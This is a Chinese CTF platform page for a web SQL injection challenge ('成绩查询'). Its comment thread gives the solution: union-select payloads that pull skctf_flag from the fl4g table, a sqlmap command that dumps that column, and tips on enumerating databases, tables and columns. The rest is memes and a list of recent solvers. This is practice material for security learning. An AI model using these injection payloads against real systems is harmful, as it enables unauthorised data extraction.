成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 11039
提  示:
描  述:
来源山科大ctf
评论
goodfxxkingbye 3年前

id=-1' union select 1,2,3,group_concat(skctf_flag) from fl4g#

回复 3
him9947 2年前

你是我大哥

回复 2

lzh20030509 3年前

评论区yyds

回复 0

15305265925 3年前

id=-1' union select 1,2,group_concat(skctf_flag),4 from fl4g-- -

回复 1

xiaoxhw 3年前

利用”不显示“代表”报错“

回复 2

笨笨笨蛋 3年前

我sqlmap进入fl4g后查看内容压根没有flag,可是手工注入又有了,这是为什么?求一个大佬解释一下

回复 0
aWxvdmVjdGY 3年前

fl4g 是db,然后找table,在找cloumns,最后dump

回复 0

教练我要打亚索 3年前

先猜一下字段,我也是没猜字段直接取数据 没取到,需要先取一下字段 然后再来取数据

回复 0

笨笨笨蛋 3年前

有大佬用sqlmap做的吗?我想看看sqlmap怎么做这个题目

回复 0
摆烂选手 2年前

@charonzzw 阿巴阿巴,摆烂选手大眼瞪小眼,咋搞啊。有没有会的,哭了

回复 0

theonlypopcat 3年前

sqlmap --url="http://靶场地址/index.php" --data="id=1" -D skctf -T fl4g -C skctf_flag --dump

回复 0

charonzzw 3年前

用burp去抓包 然后copy to flie 形成txt文件,sqlmap去运行这个包 然后依次查库 表 列就出flag了

回复 1

秋刀鱼の丸 3年前

1' and 1=2 union select 1,2,3,skctf_flag from fl4g#

回复 1

jiangyou 3年前

http://t.csdn.cn/GCIkY

回复 1

Hobin 3年前

一个sqlmap就能完美解决

回复 0

MONSTEinCAT 3年前

鸡你太美

回复 1
阿厂 3年前

哎呦你干嘛

回复 0

肥肠粉 3年前

小黑子,哥哥下的蛋你别吃

回复 0

Sauexceed 3年前

小黑子

回复 0

WriteUp

image
harry

2 金币

评分(22)

解题动态

17690101466 攻破了该题 16小时前
15939373373 攻破了该题 18小时前
zhangzhengyao 攻破了该题 19小时前
你好世界0001 攻破了该题 21小时前
所以flag在哪? 攻破了该题 22小时前
demonsong 攻破了该题 1天前
tomato_cat 攻破了该题 1天前
369563323 攻破了该题 1天前
gondluck 攻破了该题 1天前
邪恶的番茄 攻破了该题 2天前
Fengyu3321 攻破了该题 2天前
Z-M-S 攻破了该题 2天前
benx4899 攻破了该题 2天前
Yuyukon 攻破了该题 2天前
liang123456 攻破了该题 2天前
南京交通第一深情徐立超 攻破了该题 2天前
2360657787 攻破了该题 3天前
igrazee 攻破了该题 3天前
xiaodd 攻破了该题 3天前
wei8007 攻破了该题 3天前
问题反馈